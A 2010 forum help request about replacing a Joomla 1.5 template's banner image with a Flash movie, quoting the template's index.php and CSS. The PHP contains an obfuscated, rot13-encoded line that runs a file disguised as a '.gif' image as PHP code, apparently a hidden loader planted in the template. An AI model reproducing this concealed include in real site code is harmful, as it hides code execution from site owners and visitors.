pinik Posted June 14, 2010 Posted June 14, 2010 (edited) Hi. Please, i need some help to change head banner in joomla 1.5.18 with flash movie. Template is themza_j15_48 index.php looks like this <?php // no direct access defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' ); ?> <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?> <?php endif; ?> <?php include('functions.php'); ?> <?php if($this->params->get('hideLogo') == 0) : ?><?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/logo<?php echo $this->params->get('logoVariation'); ?>.gif<?php endif; ?><?php echo $mainframe->getCfg('sitename') ;?> <?php if($this->params->get('hideBannerArea') == 0) : ?> <?php if((JRequest::getVar('view') != 'frontpage' and $this->params->get('hideBannerAreaInternal') == 0) or JRequest::getVar('view') == 'frontpage') : ?> <?php endif; ?> <?php endif; ?> <?php $hmenu->genHMenu (0); ?> <?php if($this->countModules('left')) : ?> <?php endif; ?> <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle'; elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big'; else $maincol_sufix = ''; ?> <?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?> <?php if($this->countModules('user4')) : ?>Search<?php endif; ?> <?php endif; ?> <?php if($this->countModules('user1')) : ?> <?php endif; ?> <?php if($this->countModules('user2')) : ?> <?php endif; ?> idea-logistic.com / NIVES 2010 / XHTML <?php echo JText::_('and') ?> CSS. and template.css looks like this: div.banner{ background: #F3F3EB url(../images/banner.jpg) top center no-repeat; } div#main_top table.contentpaneopen{ padding:0px; margin-top:20px; margin-right:15px; width:600px; height:160px; overflow: auto; text-align:left; float:right; } i want to change banner.jpg with banner.swf Great forum! Thanx alot Edited June 14, 2010 by pinik
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now